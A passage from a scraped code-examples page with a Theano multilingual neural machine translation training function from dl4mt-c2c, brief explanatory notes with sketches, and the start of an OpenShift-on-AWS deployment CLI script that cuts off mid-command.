                use_noise.set_value(0.)

                valid_errs = pred_probs(f_log_probs,
                                        prepare_data,
                                        model_options,
                                        valid,
                                        pool_stride,
                                        verboseFreq=verboseFreq,
                                       )
                valid_err = valid_errs.mean()
                history_errs.append(valid_err)

                if uidx == 0 or valid_err <= numpy.array(history_errs).min():
                    best_p = unzip(tparams)
                    best_optp = unzip(toptparams)
                    bad_counter = 0

                if saveFreq != validFreq and save_best_models:
                    numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **best_p)
                    numpy.savez(best_opt_file_name, **best_optp)

                if len(history_errs) > patience and valid_err >= \
                        numpy.array(history_errs)[:-patience].min() and patience != -1:
                    bad_counter += 1
                    if bad_counter > patience:
                        print 'Early Stop!'
                        estop = True
                        break

                if numpy.isnan(valid_err):
                    import ipdb
                    ipdb.set_trace()

                print 'Valid ', valid_err

            # save the best model so far
            if numpy.mod(uidx, saveFreq) == 0:
                print 'Saving...',

                if not os.path.exists(model_path):
                    os.mkdir(model_path)

                params = unzip(tparams)
                optparams = unzip(toptparams)
                numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                            cidx=cidx, **params)
                numpy.savez(opt_file_name, **optparams)

                if save_every_saveFreq and (uidx >= save_burn_in):
                    this_file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
                    this_opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
                    numpy.savez(this_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    numpy.savez(this_opt_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    if best_p is not None and saveFreq != validFreq:
                        this_best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
                        numpy.savez(this_best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                    cidx=cidx, **best_p)
                print 'Done...',
                print 'Saved to %s' % file_name

            # finish after this many updates
            if uidx >= finish_after and finish_after != -1:
                print 'Finishing after %d iterations!' % uidx
                estop = True
                break

        print 'Seen %d samples' % n_samples
        eidx += 1

        if estop:
            break

    use_noise.set_value(0.)
    valid_err = pred_probs(f_log_probs,
                           prepare_data,
                           model_options,
                           valid,
                           pool_stride,
                          ).mean()

    print 'Valid ', valid_err

    params = unzip(tparams)
    optparams = unzip(toptparams)
    file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
    opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
    numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **params)
    numpy.savez(opt_file_name, **optparams)
    if best_p is not None and saveFreq != validFreq:
        best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
        best_opt_file_name = '%s%s%s.%d.best.npz' % (model_path, save_file_name, '.grads',uidx)
        numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **best_p)
        numpy.savez(best_opt_file_name, **best_optp)

    return valid_err
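The training loop above ends with patience-based early stopping: every validation error is appended to history_errs, and training aborts once the error has failed to improve on the pre-patience minimum more than patience times. A minimal, runnable sketch of that pattern (train_with_patience and the validate callback are illustrative names, not from the project):

import random

def train_with_patience(validate, max_updates=5000, validFreq=100, patience=10):
    history_errs = []
    bad_counter = 0
    for uidx in range(1, max_updates + 1):
        # ... one parameter update would happen here ...
        if uidx % validFreq == 0:
            valid_err = validate()
            history_errs.append(valid_err)
            if valid_err <= min(history_errs):
                bad_counter = 0  # new best model: reset patience
            elif len(history_errs) > patience and \
                    valid_err >= min(history_errs[:-patience]):
                bad_counter += 1
                if bad_counter > patience:
                    print('Early Stop!')
                    break
    return min(history_errs)

# e.g. a noisy validation signal; stops well before max_updates
train_with_patience(lambda: random.random())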

Example 174

Project: dl4mt-c2c Source File: nmt_many.py
def train(
      highway=2,
      dim_word=100,
      dim_word_src=200,
      enc_dim=1000,
      dec_dim=1000,  # the number of LSTM units
      model_name="model_name",
      conv_width=4,
      conv_nkernels=256,
      pool_window=-1,
      pool_stride=-1,
      patience=-1,  # early stopping patience
      max_epochs=5000,
      finish_after=-1,  # finish after this many updates
      decay_c=0.,  # L2 regularization penalty
      alpha_c=0.,  # alignment regularization
      clip_c=-1.,  # gradient clipping threshold
      lrate=0.01,  # learning rate
      n_words_src=100000,  # source vocabulary size
      n_words=100000,  # target vocabulary size
      maxlen=1000,  # maximum length of the description
      maxlen_trg=1000,  # maximum length of the description
      maxlen_sample=1000,
      optimizer='rmsprop',
      batch_size=[1,2,3,4],
      valid_batch_size=16,
      sort_size=20,
      model_path=None,
      save_file_name='model',
      save_best_models=0,
      dispFreq=100,
      validFreq=100,
      saveFreq=1000,   # save the parameters after every saveFreq updates
      sampleFreq=-1,
      pbatchFreq=-1,
      verboseFreq=10000,
      datasets=[
          'data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok'],
      valid_datasets=['../data/dev/newstest2011.en.tok',
                      '../data/dev/newstest2011.fr.tok'],
      dictionaries=[
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.en.tok.pkl',
          '/data/lisatmp3/chokyun/europarl/europarl-v7.fr-en.fr.tok.pkl'],
      source_word_level=0,
      target_word_level=0,
      dropout_gru=False,
      dropout_softmax=False,
      re_load=False,
      re_load_old_setting=False,
      uidx=None,
      eidx=None,
      cidx=None,
      layers=None,
      save_every_saveFreq=0,
      save_burn_in=20000,
      use_bpe=0,
      quit_immediately=False,
      init_params=None,
      build_model=None,
      build_sampler=None,
      gen_sample=None,
      prepare_data=None,
      **kwargs
    ):

    # Model options
    model_options = locals().copy()
    del model_options['init_params']
    del model_options['build_model']
    del model_options['build_sampler']
    del model_options['gen_sample']
    del model_options['prepare_data']

    # load dictionaries and invert them
    worddicts = [None] * len(dictionaries)
    worddicts_r = [None] * len(dictionaries)
    for ii, dd in enumerate(dictionaries):
        with open(dd, 'rb') as f:
            worddicts[ii] = cPickle.load(f)
        worddicts_r[ii] = dict()
        for kk, vv in worddicts[ii].iteritems():
            worddicts_r[ii][vv] = kk

    print 'Building model'
    if not os.path.exists(model_path):
        os.makedirs(model_path)

    file_name = '%s%s.npz' % (model_path, save_file_name)
    best_file_name = '%s%s.best.npz' % (model_path, save_file_name)
    opt_file_name = '%s%s%s.npz' % (model_path, save_file_name, '.grads')
    best_opt_file_name = '%s%s%s.best.npz' % (model_path, save_file_name, '.grads')
    model_name = '%s%s.pkl' % (model_path, save_file_name)
    params = init_params(model_options)

    cnt = 0
    cnt_emb = 0
    conv_params, hw_params = 0, 0
    for kk, vv in params.iteritems():
        if (kk == "Wemb"):
            print kk, vv.size
            cnt_emb += vv.size
        if "conv" in kk:
            print kk, vv.size
            conv_params += vv.size
        if "hw" in kk:
            print kk, vv.size
            hw_params += vv.size
        cnt += vv.size
    print "# Total params:", cnt
    print "# Emb params:", cnt_emb
    print "# Conv params:", conv_params
    print "# HW params:", hw_params
    print "# Input params:", cnt_emb + conv_params + hw_params

    if quit_immediately:
        sys.exit(1)

    cPickle.dump(model_options, open(model_name, 'wb'))
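    # one validation-error history per language pair (the DE/CS/FI/RU sets below)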
    history_errs = [[],[],[],[]]

    # reload options
    # reload : False
    if re_load and os.path.exists(file_name):
        print 'You are reloading your experiment.. do not panic dude..'
        if re_load_old_setting:
            with open(model_name, 'rb') as f:
                model_options = cPickle.load(f)
        params = load_params(file_name, params)
        # reload history
        model = numpy.load(file_name)
        history_errs = list(lst.tolist() for lst in model['history_errs'])
        if uidx is None:
            uidx = model['uidx']
        if eidx is None:
            eidx = model['eidx']
        if cidx is None:
            try:
                cidx = model['cidx']
            except:
                cidx = 0
    else:
        if uidx is None:
            uidx = 0
        if eidx is None:
            eidx = 0
        if cidx is None:
            cidx = 0

    print 'Loading data'
    train = MultiTextIterator(source=datasets[0],
                         target=datasets[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=batch_size,
                         sort_size=sort_size)

    valid = [TextIterator(source=valid_dataset[0],
                         target=valid_dataset[1],
                         source_dict=dictionaries[0],
                         target_dict=dictionaries[1],
                         n_words_source=n_words_src,
                         n_words_target=n_words,
                         source_word_level=source_word_level,
                         target_word_level=target_word_level,
                         batch_size=valid_batch_size,
                         sort_size=sort_size) for valid_dataset in valid_datasets]

    # create shared variables for parameters
    tparams = init_tparams(params)

    trng, use_noise, \
        x, x_mask, y, y_mask, \
        opt_ret, \
        cost = \
        build_model(tparams, model_options)
    # NOTE : this is where we build the model
    inps = [x, x_mask, y, y_mask]

    print 'Building sampler...\n',
    f_init, f_next = build_sampler(tparams, model_options, trng, use_noise)
    #print 'Done'

    # before any regularizer
    print 'Building f_log_probs...',
    f_log_probs = theano.function(inps, cost, profile=profile)
    # NOTE : f_log_probs : [x, x_mask, y, y_mask], cost
    print 'Done'

    if re_load: 
        use_noise.set_value(0.)
        valid_scores = []
        for ii, vv in enumerate(valid):

            valid_err = pred_probs(f_log_probs,
                                   prepare_data,
                                   model_options,
                                   vv,
                                   pool_stride,
                                   verboseFreq=verboseFreq,
                                  ).mean()
            valid_err = valid_err.mean()

            if numpy.isnan(valid_err):
                import ipdb
                ipdb.set_trace()

            print 'Reload sanity check: Valid ', valid_err

    cost = cost.mean()

    # apply L2 regularization on weights
    # decay_c : 0
    if decay_c > 0.:
        decay_c = theano.shared(numpy.float32(decay_c), name='decay_c')
        weight_decay = 0.
        for kk, vv in tparams.iteritems():
            weight_decay += (vv ** 2).sum()
        weight_decay *= decay_c
        cost += weight_decay

    # regularize the alpha weights
    # alpha_c : 0
    if alpha_c > 0. and not model_options['decoder'].endswith('simple'):
        alpha_c = theano.shared(numpy.float32(alpha_c), name='alpha_c')
        alpha_reg = alpha_c * (
            (tensor.cast(y_mask.sum(0) // x_mask.sum(0), 'float32')[:, None] -
             opt_ret['dec_alphas'].sum(0))**2).sum(1).mean()
        cost += alpha_reg

    # after all regularizers - compile the computational graph for cost
    print 'Building f_cost...',
    f_cost = theano.function(inps, cost, profile=profile)
    # NOTE : why is this not referenced somewhere later?
    print 'Done'

    print 'Computing gradient...',
    grads = tensor.grad(cost, wrt=itemlist(tparams))
    print 'Done'

    if clip_c > 0:
        grads, not_finite, clipped = gradient_clipping(grads, tparams, clip_c)
    else:
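        # dummy values so the per-update not_finite / clipped checks still work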
        not_finite = 0
        clipped = 0

    # compile the optimizer, the actual computational graph is compiled here
    lr = tensor.scalar(name='lr')
    print 'Building optimizers...',
    if re_load and os.path.exists(file_name):
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped,
                                                                  file_name=opt_file_name)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  file_name=opt_file_name)
    else:
        # re_load = False, clip_c = 1
        if clip_c > 0:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost,
                                                                  not_finite=not_finite, clipped=clipped)
        else:
            f_grad_shared, f_update, toptparams = eval(optimizer)(lr, tparams, grads, inps, cost=cost)

            # f_grad_shared = theano.function(inp, [cost, not_finite, clipped], updates=gsup, profile=profile)

            # f_update = theano.function([lr], [], updates=updates,
            #                   on_unused_input='ignore', profile=profile)
            # toptparams

    print 'Done'

    print 'Optimization'
    best_p = None
    bad_counter = 0

    if validFreq == -1:
        validFreq = len(train[0]) / batch_size
    if saveFreq == -1:
        saveFreq = len(train[0]) / batch_size

    # Training loop
    ud_start = time.time()
    estop = False

    if re_load:
        print "Checkpointed minibatch number: %d" % cidx
        for cc in xrange(cidx):
            if numpy.mod(cc, 1000)==0:
                print "Jumping [%d / %d] examples" % (cc, cidx)
            train.next()

    for epoch in xrange(max_epochs):
        time0 = time.time()
        n_samples = 0
        NaN_grad_cnt = 0
        NaN_cost_cnt = 0
        clipped_cnt = 0
        update_idx = 0
        if re_load:
            re_load = 0
        else:
            cidx = 0

        for x, y in train:
        # NOTE : x, y are [sen1, sen2, sen3 ...] where sen_i are of different length
            update_idx += 1
            cidx += 1
            uidx += 1
            use_noise.set_value(1.)

            x, x_mask, y, y_mask, n_x = prepare_data(x,
                                                     y,
                                                     pool_stride,
                                                     maxlen=maxlen,
                                                     maxlen_trg=maxlen_trg,
                                                    )

            if x is None:
                print 'Minibatch with zero samples under length ', maxlen
                uidx -= 1
                uidx = max(uidx, 0)
                continue

            if uidx == 1 or ( numpy.mod(uidx, pbatchFreq) == 0 and pbatchFreq != -1 ):
                pbatch_many(x, worddicts_r[0], n_x)

            n_samples += n_x

            # compute cost, grads and copy grads to shared variables

            if clip_c > 0:
                cost, not_finite, clipped = f_grad_shared(x, x_mask, y, y_mask)
            else:
                cost = f_grad_shared(x, x_mask, y, y_mask)

            if clipped:
                clipped_cnt += 1

            # check for bad numbers, usually we remove non-finite elements
            # and continue training - but not done here
            if numpy.isnan(cost) or numpy.isinf(cost):
                import ipdb
                ipdb.set_trace()
                NaN_cost_cnt += 1

            if not_finite:
                import ipdb
                ipdb.set_trace()
                NaN_grad_cnt += 1
                continue

            # do the update on parameters
            f_update(lrate)

            if numpy.isnan(cost) or numpy.isinf(cost):
                continue

            if float(NaN_grad_cnt) > max_epochs * 0.5 or float(NaN_cost_cnt) > max_epochs * 0.5:
                print 'Too many NaNs, abort training'
                return 1., 1., 1.

            # verbose
            if numpy.mod(uidx, dispFreq) == 0:
                ud = time.time() - ud_start
                wps = n_samples / float(time.time() - time0)
                print 'Epoch ', eidx, 'Update ', uidx, 'Cost ', cost, 'NaN_in_grad', NaN_grad_cnt,\
                      'NaN_in_cost', NaN_cost_cnt, 'Gradient_clipped', clipped_cnt, 'UD ', ud, "%.2f sentences/s" % wps
                ud_start = time.time()

            # generate some samples with the model and display them
            if numpy.mod(uidx, sampleFreq) == 0 and sampleFreq != -1:
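                # batch_size holds one minibatch size per language, so these
                # cumulative offsets (an assumption) pick the first sentence of
                # each language's block in the concatenated batch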
                gen_list = [0, batch_size[0], batch_size[0]+batch_size[1],  batch_size[0]+batch_size[1]+batch_size[2]]
                gen_list = [ii for ii in gen_list if ii < n_x]

                for jj in gen_list:
                    # jj = min(5, n_samples)
                    stochastic = True
                    use_noise.set_value(0.)

                    # x : maxlen X n_samples
                    sample, score = gen_sample(tparams, f_init, f_next,
                                               x[:, jj][:, None],
                                               model_options, trng=trng, k=1,
                                               maxlen=maxlen_sample,
                                               stochastic=stochastic,
                                               argmax=False)
                    print
                    print 'Source ', jj, ': ',
                    if source_word_level:
                        for vv in x[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[0]:
                                if use_bpe:
                                    print (worddicts_r[0][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[0][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        source_ = []
                        for ii, vv in enumerate(x[:, jj]):
                            if vv == 0 or vv == 2 or vv == 3:
                                continue

                            if vv in worddicts_r[0]:
                                source_.append(worddicts_r[0][vv])
                            else:
                                source_.append('UNK')
                        print "".join(source_)
                    print 'Truth ', jj, ' : ',
                    if target_word_level:
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        truth_ = []
                        for vv in y[:, jj]:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                truth_.append(worddicts_r[1][vv])
                            else:
                                truth_.append('UNK')
                        print "".join(truth_)
                    print 'Sample ', jj, ': ',
                    if stochastic:
                        ss = sample
                    else:
                        score = score / numpy.array([len(s) for s in sample])
                        ss = sample[score.argmin()]
                    if target_word_level:
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                if use_bpe:
                                    print (worddicts_r[1][vv]).replace('@@', ''),
                                else:
                                    print worddicts_r[1][vv],
                            else:
                                print 'UNK',
                        print
                    else:
                        sample_ = []
                        for vv in ss:
                            if vv == 0:
                                break
                            if vv in worddicts_r[1]:
                                sample_.append(worddicts_r[1][vv])
                            else:
                                sample_.append('UNK')
                        print "".join(sample_)
                    print

            # validate model on validation set and early stop if necessary
            if numpy.mod(uidx, validFreq) == 0:
                valid_scores = []
                for ii, vv in enumerate(valid):
                    use_noise.set_value(0.)

                    valid_errs = pred_probs(f_log_probs,
                                            prepare_data,
                                            model_options,
                                            vv,
                                            pool_stride,
                                            verboseFreq=verboseFreq,
                                           )
                    valid_err = valid_errs.mean()
                    valid_scores.append(valid_err)
                    history_errs[ii].append(valid_err)

                    # patience == -1, never happens
                    if len(history_errs[ii]) > patience and valid_err >= \
                            numpy.array(history_errs[ii])[:-patience].min() and patience != -1:
                        bad_counter += 1
                        if bad_counter > patience:
                            print 'Early Stop!'
                            estop = True
                            break

                    if numpy.isnan(valid_err):
                        import ipdb
                        ipdb.set_trace()

                cnt = 0
                for ii in xrange(4):
                    if uidx == 0 or valid_scores[ii] <= numpy.array(history_errs[ii]).min():
                        cnt += 1 # cnt : the number of language pairs whose validation cost just hit a new minimum

                if cnt >= 2:
                    best_p = unzip(tparams)
                    best_optp = unzip(toptparams)
                    bad_counter = 0

                if saveFreq != validFreq and save_best_models:
                    numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **best_p)
                    numpy.savez(best_opt_file_name, **best_optp)

                print 'Valid : DE {}\t CS {}\t FI {}\t RU {}'.format(valid_scores[0], valid_scores[1], valid_scores[2], valid_scores[3])

            # save the best model so far
            if numpy.mod(uidx, saveFreq) == 0:
                print 'Saving...',

                if not os.path.exists(model_path):
                    os.mkdir(model_path)

                params = unzip(tparams)
                optparams = unzip(toptparams)
                numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                            cidx=cidx, **params)
                numpy.savez(opt_file_name, **optparams)

                if save_every_saveFreq and (uidx >= save_burn_in):
                    this_file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
                    this_opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
                    numpy.savez(this_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    numpy.savez(this_opt_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                cidx=cidx, **params)
                    if best_p is not None and saveFreq != validFreq:
                        this_best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
                        numpy.savez(this_best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx,
                                    cidx=cidx, **best_p)
                print 'Done...',
                print 'Saved to %s' % file_name

            # finish after this many updates
            if uidx >= finish_after and finish_after != -1:
                print 'Finishing after %d iterations!' % uidx
                estop = True
                break

        print 'Seen %d samples' % n_samples
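        # hard-coded per-language training-set sizes (sentence pairs),
        # matching the DE/CS/FI/RU order in the report below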
        lang_nos = (4535523, 12122376, 1926115, 2326893)
        lang_done = [x * update_idx for x in batch_size]
        lang_rem = [x - y for x,y in zip(lang_nos, lang_done)]
        print "Remaining : DE({}), CS({}), FI({}), RU({})".format(lang_rem[0], lang_rem[1], lang_rem[2], lang_rem[3])
        eidx += 1

        if estop:
            break

    use_noise.set_value(0.)

    valid_scores = []
    for ii, vv in enumerate(valid):

        valid_err = pred_probs(f_log_probs,
                               prepare_data,
                               model_options,
                               vv,
                               pool_stride,
                              ).mean()
        valid_scores.append(valid_err)

    print 'Valid : DE {}\t CS {}\t FI {}\t RU {}'.format(valid_scores[0], valid_scores[1], valid_scores[2], valid_scores[3])

    params = unzip(tparams)
    optparams = unzip(toptparams)
    file_name = '%s%s.%d.npz' % (model_path, save_file_name, uidx)
    opt_file_name = '%s%s%s.%d.npz' % (model_path, save_file_name, '.grads', uidx)
    numpy.savez(file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **params)
    numpy.savez(opt_file_name, **optparams)
    if best_p is not None and saveFreq != validFreq:
        best_file_name = '%s%s.%d.best.npz' % (model_path, save_file_name, uidx)
        best_opt_file_name = '%s%s%s.%d.best.npz' % (model_path, save_file_name, '.grads',uidx)
        numpy.savez(best_file_name, history_errs=history_errs, uidx=uidx, eidx=eidx, cidx=cidx, **best_p)
        numpy.savez(best_opt_file_name, **best_optp)

    return valid_err
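Note that the only sys.exit call in this example is the quit_immediately branch near the top: after init_params the script prints a breakdown of the parameter counts and exits with status 1, so the model size can be inspected without starting training. A minimal sketch of that dry-run pattern (report_params and the toy parameter dict are hypothetical):

import sys
import numpy

def report_params(params, quit_immediately=False):
    # params: name -> numpy array, as produced by an init_params-style helper
    total = sum(vv.size for vv in params.values())
    emb = sum(vv.size for kk, vv in params.items() if kk == 'Wemb')
    print('# Total params: %d' % total)
    print('# Emb params: %d' % emb)
    if quit_immediately:
        sys.exit(1)  # dry run: report the size, then bail out

report_params({'Wemb': numpy.zeros((100, 50)), 'ff_W': numpy.zeros((50, 50))})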

Example 175

Project: openshift-ansible-contrib Source File: ose-on-aws.py
@click.command()

### Cluster options
@click.option('--stack-name', default='openshift-infra', help='Cloudformation stack name. Must be unique',
              show_default=True)
@click.option('--console-port', default='443', type=click.IntRange(1,65535), help='OpenShift web console port',
              show_default=True)
@click.option('--deployment-type', default='openshift-enterprise', help='OpenShift deployment type',
              show_default=True)

### AWS/EC2 options
@click.option('--region', default='us-east-1', help='ec2 region',
              show_default=True)
@click.option('--ami', default='ami-10251c7a', help='ec2 ami',
              show_default=True)
@click.option('--master-instance-type', default='m4.large', help='ec2 instance type',
              show_default=True)
@click.option('--node-instance-type', default='t2.medium', help='ec2 instance type',
              show_default=True)
@click.option('--app-instance-type', default='t2.medium', help='ec2 instance type',
              show_default=True)
@click.option('--bastion-instance-type', default='t2.micro', help='ec2 instance type',
              show_default=True)
@click.option('--keypair', help='ec2 keypair name',
              show_default=True)
@click.option('--create-key', default='no', help='Create SSH keypair',
              show_default=True)
@click.option('--key-path', default='/dev/null', help='Path to SSH public key. Default is /dev/null which will skip the step',
              show_default=True)
@click.option('--create-vpc', default='yes', help='Create VPC',
              show_default=True)
@click.option('--vpc-id', help='Specify an already existing VPC',
              show_default=True)
@click.option('--private-subnet-id1', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--private-subnet-id2', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--private-subnet-id3', help='Specify a Private subnet within the existing VPC',
              show_default=True)
@click.option('--public-subnet-id1', help='Specify a Public subnet within the existing VPC',
              show_default=True)
@click.option('--public-subnet-id2', help='Specify a Public subnet within the existing VPC',
              show_default=True)
@click.option('--public-subnet-id3', help='Specify a Public subnet within the existing VPC',
              show_default=True)

### DNS options
@click.option('--public-hosted-zone', help='hosted zone for accessing the environment')
@click.option('--app-dns-prefix', default='apps', help='application dns prefix',
              show_default=True)

### Subscription and Software options
@click.option('--rhsm-user', help='Red Hat Subscription Management User')
@click.option('--rhsm-password', help='Red Hat Subscription Management Password',
                hide_input=True,)
@click.option('--rhsm-pool', help='Red Hat Subscription Management Pool ID or Subscription Name')

### Miscellaneous options
@click.option('--byo-bastion', default='no', help='skip bastion install when one exists within the cloud provider',
              show_default=True)
@click.option('--bastion-sg', default='/dev/null', help='Specify Bastion Security group used with byo-bastion',
              show_default=True)
@click.option('--containerized', default='False', help='Containerized installation of OpenShift',
              show_default=True)
@click.option('--s3-bucket-name', help='Bucket name for S3 for registry')
@click.option('--s3-username', help='S3 user for registry access')
@click.option('--no-confirm', is_flag=True,
              help='Skip confirmation prompt')
@click.help_option('--help', '-h')
@click.option('-v', '--verbose', count=True)

def launch_refarch_env(region=None,
                    stack_name=None,
                    ami=None,
                    no_confirm=False,
                    master_instance_type=None,
                    node_instance_type=None,
                    app_instance_type=None,
                    bastion_instance_type=None,
                    keypair=None,
                    create_key=None,
                    key_path=None,
                    create_vpc=None,
                    vpc_id=None,
                    private_subnet_id1=None,
                    private_subnet_id2=None,
                    private_subnet_id3=None,
                    public_subnet_id1=None,
                    public_subnet_id2=None,
                    public_subnet_id3=None,
                    byo_bastion=None,
                    bastion_sg=None,
                    public_hosted_zone=None,
                    app_dns_prefix=None,
                    deployment_type=None,
                    console_port=443,
                    rhsm_user=None,
                    rhsm_password=None,
                    rhsm_pool=None,
                    containerized=None,
                    s3_bucket_name=None,
                    s3_username=None,
                    verbose=0):

  # Need to prompt for the R53 zone:
  if public_hosted_zone is None:
    public_hosted_zone = click.prompt('Hosted DNS zone for accessing the environment')


  if s3_bucket_name is None:
    s3_bucket_name = stack_name + '-ocp-registry-' + public_hosted_zone.split('.')[0]

  if s3_username is None:
    s3_username = stack_name + '-s3-openshift-user'

  # Create ssh key pair in AWS if none is specified
  if create_key == 'yes' and key_path == '/dev/null':
    key_path = click.prompt('Specify path for ssh public key')
    keypair = click.prompt('Specify a name for the keypair')

  # If no keypair is specified, fail:
  if keypair is None and create_key == 'no':
    click.echo('A SSH keypair must be specified or created')
    sys.exit(1)

  # Name the keypair if a path is defined
  if keypair is None and create_key == 'yes':
    keypair = click.prompt('Specify a name for the keypair')

  # If no VPC is defined, prompt:
  if create_vpc == 'no' and vpc_id is None:
    vpc_id = click.prompt('Specify the VPC ID')

  # If no subnets are defined, prompt:
  if create_vpc == 'no' and private_subnet_id1 is None:
    private_subnet_id1 = click.prompt('Specify the first Private subnet within the existing VPC')
    private_subnet_id2 = click.prompt('Specify the second Private subnet within the existing VPC')
    private_subnet_id3 = click.prompt('Specify the third Private subnet within the existing VPC')
    public_subnet_id1 = click.prompt('Specify the first Public subnet within the existing VPC')
    public_subnet_id2 = click.prompt('Specify the second Public subnet within the existing VPC')
    public_subnet_id3 = click.prompt('Specify the third Public subnet within the existing VPC')

  # Prompt for Bastion SG if byo-bastion specified
  if byo_bastion == 'yes' and bastion_sg == '/dev/null':
    bastion_sg = click.prompt('Specify the Bastion Security group (example: sg-4afdd24)')

  # If the user already provided values, don't bother asking again
  if deployment_type in ['openshift-enterprise'] and rhsm_user is None:
    rhsm_user = click.prompt("RHSM username?")
  if deployment_type in ['openshift-enterprise'] and rhsm_password is None:
    rhsm_password = click.prompt("RHSM password?", hide_input=True)
  if deployment_type in ['openshift-enterprise'] and rhsm_pool is None:
    rhsm_pool = click.prompt("RHSM Pool ID or Subscription Name?")

  # Calculate various DNS values
  wildcard_zone="%s.%s" % (app_dns_prefix, public_hosted_zone)

  # Display information to the user about their choices
  click.echo('Configured values:')
  click.echo('\tstack_name: %s' % stack_name)
  click.echo('\tami: %s' % ami)
  click.echo('\tregion: %s' % region)
  click.echo('\tmaster_instance_type: %s' % master_instance_type)
  click.echo('\tnode_instance_type: %s' % node_instance_type)
  click.echo('\tapp_instance_type: %s' % app_instance_type)
  click.echo('\tbastion_instance_type: %s' % bastion_instance_type)
  click.echo('\tkeypair: %s' % keypair)
  click.echo('\tcreate_key: %s' % create_key)
  click.echo('\tkey_path: %s' % key_path)
  click.echo('\tcreate_vpc: %s' % create_vpc)
  click.echo('\tvpc_id: %s' % vpc_id)
  click.echo('\tprivate_subnet_id1: %s' % private_subnet_id1)
  click.echo('\tprivate_subnet_id2: %s' % private_subnet_id2)
  click.echo('\tprivate_subnet_id3: %s' % private_subnet_id3)
  click.echo('\tpublic_subnet_id1: %s' % public_subnet_id1)
  click.echo('\tpublic_subnet_id2: %s' % public_subnet_id2)
  click.echo('\tpublic_subnet_id3: %s' % public_subnet_id3)
  click.echo('\tbyo_bastion: %s' % byo_bastion)
  click.echo('\tbastion_sg: %s' % bastion_sg)
  click.echo('\tconsole port: %s' % console_port)
  click.echo('\tdeployment_type: %s' % deployment_type)
  click.echo('\tpublic_hosted_zone: %s' % public_hosted_zone)
  click.echo('\tapp_dns_prefix: %s' % app_dns_prefix)
  click.echo('\tapps_dns: %s' % wildcard_zone)
  click.echo('\trhsm_user: %s' % rhsm_user)
  click.echo('\trhsm_password: *******')
  click.echo('\trhsm_pool: %s' % rhsm_pool)
  click.echo('\tcontainerized: %s' % containerized)
  click.echo('\ts3_bucket_name: %s' % s3_bucket_name)
  click.echo('\ts3_username: %s' % s3_username)
  click.echo("")

  if not no_confirm:
    click.confirm('Continue using these values?', abort=True)

  playbooks = ['playbooks/infrastructure.yaml', 'playbooks/openshift-install.yaml']

  for playbook in playbooks:

    # hide cache output unless in verbose mode
    devnull='> /dev/null'

    if verbose > 0:
      devnull=''

    # refresh the inventory cache to prevent stale hosts from
    # interfering with re-running
    command='inventory/aws/hosts/ec2.py --refresh-cache %s' % (devnull)
    os.system(command)

    # remove any cached facts to prevent stale data during a re-run
    command='rm -rf .ansible/cached_facts'
    os.system(command)

    command='ansible-playbook -i inventory/aws/hosts -e \'region=%s \
    stack_name=%s \
    ami=%s \
    keypair=%s \
    create_key=%s \
    key_path=%s \
    create_vpc=%s \
    vpc_id=%s \
    private_subnet_id1=%s \
    private_subnet_id2=%s \
    private_subnet_id3=%s \
    public_subnet_id1=%s \
    public_subnet_id2=%s \
    public_subnet_id3=%s \
    byo_bastion=%s \
    bastion_sg=%s \
    master_instance_type=%s \
    node_instance_type=%s \
    app_instance_type=%s \
    bastion_instance_type=%s \
    public_hosted_zone=%s \
    wildcard_zone=%s \
    console_port=%s \
    deployment_type=%s \
    rhsm_user=%s \
    rhsm_password=%s \
    rhsm_pool=%s \
    containerized=%s \
    s3_bucket_name=%s \
    s3_username=%s \' %s' % (region,
                    stack_name,
                    ami,
                    keypair,
                    create_key,
                    key_path,
                    create_vpc,
                    vpc_id,
                    private_subnet_id1,
